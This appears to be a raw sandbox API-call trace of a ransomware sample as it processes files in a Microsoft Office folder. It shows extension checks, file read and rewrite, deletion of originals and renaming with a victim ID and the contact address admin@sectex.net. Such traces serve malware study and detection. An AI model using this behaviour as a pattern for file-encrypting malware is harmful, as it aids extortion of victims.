	[0148.800] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString=".bz2") returned 4
	[0148.800] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.800] lstrlenW (lpString=".7z") returned 3
	[0148.801] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.801] lstrlenW (lpString=".dbf") returned 4
	[0148.801] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.801] lstrlenW (lpString=".1cd") returned 4
	[0148.801] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.801] lstrlenW (lpString=".jpg") returned 4
	[0148.801] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.801] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0148.801] lstrlenW (lpString="OMSINTL.DLL.IDX_DLL") returned 19
	[0148.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.803] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=24960) returned 1
	[0148.803] CloseHandle (hObject=0x3f4) returned 1
	[0148.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll")) returned 0x20
	[0148.804] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.804] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.804] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.805] GetLastError () returned 0x0
	[0148.805] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x6180, lpOverlapped=0x0) returned 1
	[0148.807] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x6190, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x6190, lpOverlapped=0x0) returned 1
	[0148.808] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.808] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0148.808] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.809] CloseHandle (hObject=0x3d4) returned 1
	[0148.809] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.809] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.811] CloseHandle (hObject=0x3f4) returned 1
	[0148.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll")) returned 1
	[0148.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.812] lstrlenW (lpString=".doc") returned 4
	[0148.812] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0148.812] lstrlenW (lpString=".docx") returned 5
	[0148.812] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0148.812] lstrlenW (lpString=".pdf") returned 4
	[0148.812] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0148.812] lstrlenW (lpString=".xls") returned 4
	[0148.812] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0148.812] lstrlenW (lpString=".xlsx") returned 5
	[0148.812] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0148.812] lstrlenW (lpString=".ppt") returned 4
	[0148.812] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0148.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString=".zip") returned 4
	[0148.813] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".rar") returned 4
	[0148.813] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".bz2") returned 4
	[0148.813] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".7z") returned 3
	[0148.813] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString=".dbf") returned 4
	[0148.813] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString=".1cd") returned 4
	[0148.813] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString=".jpg") returned 4
	[0148.813] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.813] lstrlenW (lpString=".doc") returned 4
	[0148.813] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".docx") returned 5
	[0148.813] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0148.813] lstrlenW (lpString=".pdf") returned 4
	[0148.813] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".xls") returned 4
	[0148.813] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0148.813] lstrlenW (lpString=".xlsx") returned 5
	[0148.813] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0148.813] lstrlenW (lpString=".ppt") returned 4
	[0148.813] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.814] lstrlenW (lpString=".zip") returned 4
	[0148.814] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString=".rar") returned 4
	[0148.814] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString=".bz2") returned 4
	[0148.814] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString=".7z") returned 3
	[0148.814] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.814] lstrlenW (lpString=".dbf") returned 4
	[0148.814] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.814] lstrlenW (lpString=".1cd") returned 4
	[0148.814] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0148.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 67
	[0148.814] lstrlenW (lpString=".jpg") returned 4
	[0148.814] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0148.814] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0148.814] lstrlenW (lpString="ONELEV.EXE") returned 10
	[0148.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onelev.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.815] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=57224) returned 1
	[0148.815] CloseHandle (hObject=0x3f4) returned 1
	[0148.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onelev.exe")) returned 0x20
	[0148.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onelev.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onelev.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0148.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.815] lstrlenW (lpString=".doc") returned 4
	[0148.815] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0148.816] lstrlenW (lpString=".docx") returned 5
	[0148.816] lstrcmpiW (lpString1=".docx", lpString2="V.EXE") returned -1
	[0148.816] lstrlenW (lpString=".pdf") returned 4
	[0148.816] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString=".xls") returned 4
	[0148.816] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString=".xlsx") returned 5
	[0148.816] lstrcmpiW (lpString1=".xlsx", lpString2="V.EXE") returned -1
	[0148.816] lstrlenW (lpString=".ppt") returned 4
	[0148.816] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.816] lstrlenW (lpString=".zip") returned 4
	[0148.816] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString=".rar") returned 4
	[0148.816] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString=".bz2") returned 4
	[0148.816] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0148.816] lstrlenW (lpString=".7z") returned 3
	[0148.816] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.816] lstrlenW (lpString=".dbf") returned 4
	[0148.816] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.816] lstrlenW (lpString=".1cd") returned 4
	[0148.816] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.816] lstrlenW (lpString=".jpg") returned 4
	[0148.816] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.817] lstrlenW (lpString=".doc") returned 4
	[0148.817] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0148.817] lstrlenW (lpString=".docx") returned 5
	[0148.817] lstrcmpiW (lpString1=".docx", lpString2="V.EXE") returned -1
	[0148.817] lstrlenW (lpString=".pdf") returned 4
	[0148.817] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0148.817] lstrlenW (lpString=".xls") returned 4
	[0148.817] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0148.817] lstrlenW (lpString=".xlsx") returned 5
	[0148.817] lstrcmpiW (lpString1=".xlsx", lpString2="V.EXE") returned -1
	[0148.817] lstrlenW (lpString=".ppt") returned 4
	[0148.817] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0148.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.817] lstrlenW (lpString=".zip") returned 4
	[0148.817] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0148.817] lstrlenW (lpString=".rar") returned 4
	[0148.817] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0148.817] lstrlenW (lpString=".bz2") returned 4
	[0148.817] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0148.817] lstrlenW (lpString=".7z") returned 3
	[0148.817] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0148.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.817] lstrlenW (lpString=".dbf") returned 4
	[0148.817] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0148.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.817] lstrlenW (lpString=".1cd") returned 4
	[0148.817] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0148.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONELEV.EXE") returned 58
	[0148.817] lstrlenW (lpString=".jpg") returned 4
	[0148.817] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0148.818] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0148.818] lstrlenW (lpString="ONENOTE.HXS") returned 11
	[0148.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.818] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1750992) returned 1
	[0148.818] CloseHandle (hObject=0x3f4) returned 1
	[0148.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs")) returned 0x20
	[0148.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0148.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.820] lstrlenW (lpString=".doc") returned 4
	[0148.820] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.820] lstrlenW (lpString=".docx") returned 5
	[0148.820] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0148.820] lstrlenW (lpString=".pdf") returned 4
	[0148.820] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.820] lstrlenW (lpString=".xls") returned 4
	[0148.820] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.820] lstrlenW (lpString=".xlsx") returned 5
	[0148.820] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0148.820] lstrlenW (lpString=".ppt") returned 4
	[0148.820] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.820] lstrlenW (lpString=".zip") returned 4
	[0148.820] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.820] lstrlenW (lpString=".rar") returned 4
	[0148.820] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.820] lstrlenW (lpString=".bz2") returned 4
	[0148.820] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.820] lstrlenW (lpString=".7z") returned 3
	[0148.820] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.820] lstrlenW (lpString=".dbf") returned 4
	[0148.820] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString=".1cd") returned 4
	[0148.821] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString=".jpg") returned 4
	[0148.821] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString=".doc") returned 4
	[0148.821] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.821] lstrlenW (lpString=".docx") returned 5
	[0148.821] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0148.821] lstrlenW (lpString=".pdf") returned 4
	[0148.821] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString=".xls") returned 4
	[0148.821] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString=".xlsx") returned 5
	[0148.821] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0148.821] lstrlenW (lpString=".ppt") returned 4
	[0148.821] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString=".zip") returned 4
	[0148.821] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString=".rar") returned 4
	[0148.821] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.821] lstrlenW (lpString=".bz2") returned 4
	[0148.821] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.821] lstrlenW (lpString=".7z") returned 3
	[0148.821] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.821] lstrlenW (lpString=".dbf") returned 4
	[0148.821] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.822] lstrlenW (lpString=".1cd") returned 4
	[0148.822] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS") returned 59
	[0148.822] lstrlenW (lpString=".jpg") returned 4
	[0148.822] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.822] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0148.822] lstrlenW (lpString="OneNoteSyncPCIntl.dll") returned 21
	[0148.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenotesyncpcintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.822] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9704) returned 1
	[0148.822] CloseHandle (hObject=0x3f4) returned 1
	[0148.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenotesyncpcintl.dll")) returned 0x20
	[0148.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenotesyncpcintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenotesyncpcintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0148.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.824] lstrlenW (lpString=".doc") returned 4
	[0148.824] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0148.824] lstrlenW (lpString=".docx") returned 5
	[0148.824] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0148.824] lstrlenW (lpString=".pdf") returned 4
	[0148.824] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0148.824] lstrlenW (lpString=".xls") returned 4
	[0148.824] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0148.824] lstrlenW (lpString=".xlsx") returned 5
	[0148.825] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0148.825] lstrlenW (lpString=".ppt") returned 4
	[0148.825] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString=".zip") returned 4
	[0148.825] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0148.825] lstrlenW (lpString=".rar") returned 4
	[0148.825] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0148.825] lstrlenW (lpString=".bz2") returned 4
	[0148.825] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0148.825] lstrlenW (lpString=".7z") returned 3
	[0148.825] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString=".dbf") returned 4
	[0148.825] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString=".1cd") returned 4
	[0148.825] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString=".jpg") returned 4
	[0148.825] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.825] lstrlenW (lpString=".doc") returned 4
	[0148.825] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0148.825] lstrlenW (lpString=".docx") returned 5
	[0148.825] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0148.825] lstrlenW (lpString=".pdf") returned 4
	[0148.826] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0148.826] lstrlenW (lpString=".xls") returned 4
	[0148.826] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0148.826] lstrlenW (lpString=".xlsx") returned 5
	[0148.826] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0148.826] lstrlenW (lpString=".ppt") returned 4
	[0148.826] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
